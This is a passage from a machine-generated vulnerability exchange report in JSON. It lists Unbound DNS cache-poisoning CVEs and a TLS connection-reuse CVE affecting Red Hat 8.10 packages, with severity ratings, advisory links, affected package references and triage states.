          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44690",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        345
      ],
      "description": "In NLnet Labs Unbound 1.7.0 up to and including 1.25.1, insufficient validation of the RRSIG.Labels field combined with premature cache writes during RFC 8198 aggressive NSEC processing leads to cache poisoning that permits a malicious actor controlling a single delegated zone to poison arbitrary sibling zones under NSEC-signed parent domains. A malicious actor with one registered domain under an NSEC-signed TLD can serve malicious insecure DNS responses for unrelated sibling domains (sharing the same parent zone). Arbitrary delegations that do not exist under the parent domain and are covered by the parent's NSEC chain can be brought into insecure existence by fraudulent wildcard DS records (less labels than expected, unknown algorithm) from the malicious sibling domain. This allows the malicious actor to inject insecure wildcard records for those delegations.",
      "recommendation": "Upgrade python3-unbound to version 1.16.2-5.14.el8_10; Upgrade unbound-libs to version 1.16.2-5.14.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44690"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55841"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55892"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44690"
        },
        {
          "url": "https://bugzilla.redhat.com/2503063"
        },
        {
          "url": "https://bugzilla.redhat.com/2503075"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2503063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2503075"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44690"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-55973"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55892.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55841"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44690.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55892.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44690"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44690"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44690.txt"
        }
      ],
      "published": "2026-07-22T14:17:19+00:00",
      "updated": "2026-07-24T13:57:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-46582",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        358
      ],
      "description": "In NLnet Labs Unbound 1.6.0 up to and including 1.25.1, a replay of a wildcard rrset as another piece of data, could be briefly considered DNSSEC secure based only on the RRSIG validation and stored into cache, before later validation treats it as bogus based on NSEC validation. When the resolving thread puts secure on the rrset, and another thread that is on the serve expired path then picks up the updated rrset contents with the secure status for a reply, it can be used to change a specific record, next to a wildcard that could be covered by the wildcard, into the wildcard. A malicious actor can exploit the possible poisonous effect by having any DNSSEC-singed domain (irrelevant to the victim domain) and a CNAME wrapper record that points to a record next to a wildcard (that could be covered by the wildcard). Then quering Unbound for the wildcard sibling record would seed the secure message. A later (after expiry) query for the CNAME wrapper would need to resolve the target sibling record. If the wildcard replay is injected into the response, the wildcard rrset will update the expired sibling record with a secure status before completing proper wildcard validation with NSEC records and eventually treating the CNAME wrapper answer as bogus. The updated poisoned rrset is now secure and points to the wildcard. This vulnerability is explicit for the serve expired path and needs injection of the signed wildcard rrset without the NSEC accompanying rrset.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46582"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46582"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46582"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46582"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-46582.txt"
        }
      ],
      "published": "2026-07-22T14:17:19+00:00",
      "updated": "2026-07-24T13:55:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295,
        319
      ],
      "description": "A vulnerability exists where a connection requiring TLS incorrectly reuses an\nexisting unencrypted connection from the same connection pool. If an initial\ntransfer is made in clear-text (via IMAP, SMTP, or POP3), a subsequent request\nto that same host bypasses the TLS requirement and instead transmit data\nunencrypted.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4873"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/7"
        },
        {
